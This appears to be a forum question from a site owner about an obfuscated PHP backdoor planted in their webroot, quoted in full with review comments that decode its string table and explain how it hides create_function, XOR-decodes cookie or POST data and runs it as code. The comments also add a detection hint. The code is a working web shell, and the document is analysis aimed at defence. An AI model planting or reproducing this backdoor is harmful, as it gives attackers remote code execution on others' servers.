Somebody hacked my web server and uploaded many files like the following one, under random names, into different subdirectories of my webroot. The file looks something like this, and even though I managed to beautify it, I am unable to decipher the obfuscation.
I can see that potential code injection is happening through the `$_POST` and `$_COOKIE` variables, but what I find very interesting is the lack of any `eval` calls; the function is even deactivated in my php.ini.
Anyway here's the code and I'd appreciate any kind of insights:
<?php
// NOTE(review): obfuscated backdoor sample. Analysis comments only; the code is unchanged.
// $wldxznb is a 35-character lookup alphabet. Every string below is spelled by
// indexing into it, so no function name appears literally in the file and a
// plain grep for names such as "create_function" finds nothing.
$wldxznb = 'r5a3m#uvplebgsH\'co*6i8-_7tx14nfk0yd';
// $vcekj is the decoded string table. The code further down invokes most of
// its entries as variable functions: $vcekj[N](...).
$vcekj = Array();
// [0] => "create_function" (compiles a string into a callable, the eval substitute)
$vcekj[] = $wldxznb[16] . $wldxznb[0] . $wldxznb[10] . $wldxznb[2] . $wldxznb[25] . $wldxznb[10] . $wldxznb[23] . $wldxznb[30] . $wldxznb[6] . $wldxznb[29] . $wldxznb[16] . $wldxznb[25] . $wldxznb[20] . $wldxznb[17] . $wldxznb[29];
// [1] => "H*" (pack() format: hex string, high nibble first)
$vcekj[] = $wldxznb[14] . $wldxznb[18];
// [2] => "5c8fedec-e810-4fca-bb16-315b4dd7ad6d" (UUID-shaped constant that is
//        appended to the request field name to form the XOR key)
$vcekj[] = $wldxznb[1] . $wldxznb[16] . $wldxznb[21] . $wldxznb[30] . $wldxznb[10] . $wldxznb[34] . $wldxznb[10] . $wldxznb[16] . $wldxznb[22] . $wldxznb[10] . $wldxznb[21] . $wldxznb[27] . $wldxznb[32] . $wldxznb[22] . $wldxznb[28] . $wldxznb[30] . $wldxznb[16] . $wldxznb[2] . $wldxznb[22] . $wldxznb[11] . $wldxznb[11] . $wldxznb[27] . $wldxznb[19] . $wldxznb[22] . $wldxznb[3] . $wldxznb[27] . $wldxznb[1] . $wldxznb[11] . $wldxznb[28] . $wldxznb[34] . $wldxznb[34] . $wldxznb[24] . $wldxznb[2] . $wldxznb[34] . $wldxznb[19] . $wldxznb[34];
// [3] => "#" (delimiter passed to explode())
$vcekj[] = $wldxznb[5];
// [4] => "count"
$vcekj[] = $wldxznb[16] . $wldxznb[17] . $wldxznb[6] . $wldxznb[29] . $wldxznb[25];
// [5] => "str_repeat"
$vcekj[] = $wldxznb[13] . $wldxznb[25] . $wldxznb[0] . $wldxznb[23] . $wldxznb[0] . $wldxznb[10] . $wldxznb[8] . $wldxznb[10] . $wldxznb[2] . $wldxznb[25];
// [6] => "explode"
$vcekj[] = $wldxznb[10] . $wldxznb[26] . $wldxznb[8] . $wldxznb[9] . $wldxznb[17] . $wldxznb[34] . $wldxznb[10];
// [7] => "substr"
$vcekj[] = $wldxznb[13] . $wldxznb[6] . $wldxznb[11] . $wldxznb[13] . $wldxznb[25] . $wldxznb[0];
// [8] => "array_merge"
$vcekj[] = $wldxznb[2] . $wldxznb[0] . $wldxznb[0] . $wldxznb[2] . $wldxznb[33] . $wldxznb[23] . $wldxznb[4] . $wldxznb[10] . $wldxznb[0] . $wldxznb[12] . $wldxznb[10];
// [9] => "strlen"
$vcekj[] = $wldxznb[13] . $wldxznb[25] . $wldxznb[0] . $wldxznb[9] . $wldxznb[10] . $wldxznb[29];
// [10] => "pack"
$vcekj[] = $wldxznb[8] . $wldxznb[2] . $wldxznb[16] . $wldxznb[31];
// NOTE(review): request handler of the backdoor. Analysis comments only; the code is unchanged.
// $vcekj[8] resolves to "array_merge", so the loop walks every cookie and
// POST field of the incoming request as name => value.
// Why there is no eval: the string compiled at the end goes through
// $vcekj[0] = "create_function", which turns a string into executable code
// just like eval. Disabling eval therefore does not stop this file.
// create_function() was deprecated in PHP 7.2 and removed in PHP 8.0; on
// older versions it can be listed in disable_functions.
// NOTE(review): the three helpers are declared inside the loop body. PHP
// normally raises a "Cannot redeclare" fatal error if such a declaration is
// executed twice, so a second iteration presumably never completes. Confirm
// on the PHP version in use.
foreach ($vcekj[8]($_COOKIE, $_POST) as $wxusr => $pjrusp)
{
// wwdlf: builds an XOR key of $qwdotr bytes.
// Equivalent to substr(str_repeat($wxusr . <constant $vcekj[2]>, $qwdotr / strlen($wxusr) + 1), 0, $qwdotr),
// i.e. the field name plus the embedded constant, repeated and cut to length.
function wwdlf($vcekj, $wxusr, $qwdotr)
{
return $vcekj[7]($vcekj[5]($wxusr . $vcekj[2], ($qwdotr / $vcekj[9]($wxusr)) + 1) , 0, $qwdotr);
}
// irngfrj: pack("H*", $axsex) converts a hex string to raw bytes.
// The @ suppresses the warning pack() emits on non-hex input.
function irngfrj($vcekj, $axsex)
{
return @$vcekj[10]($vcekj[1], $axsex);
}
// vadod: executes the decoded request data when it has the expected shape.
// $axsex is the array produced by explode("#", ...) in the caller.
function vadod($vcekj, $axsex)
{
// count($axsex) % 3: only proceed when the element count is a multiple of 3.
$onlwwe = $vcekj[4]($axsex) % 3;
if (!$onlwwe)
{
$zznqw = $vcekj[0];
// Element 1 is called as a function on element 2, and the return value is
// compiled by create_function("", ...) as the body of a new function.
$juptpoi = $zznqw("", $axsex[1]($axsex[2]));
// Run the freshly compiled code, then stop so the rest of the loop never executes.
$juptpoi();
exit();
}
}
// Step 1: hex-decode the raw field value.
$pjrusp = irngfrj($vcekj, $pjrusp);
// Step 2: XOR the bytes with the key from wwdlf(), split the result on "#"
// ($vcekj[3]) and hand the parts to vadod(). Values that do not decode to a
// multiple of three parts are silently ignored.
// Detection hint: look for requests to randomly named .php files that carry
// long hex-only cookie or POST values.
vadod($vcekj, $vcekj[6]($vcekj[3], $pjrusp ^ wwdlf($vcekj, $wxusr, $vcekj[9]($pjrusp))));
}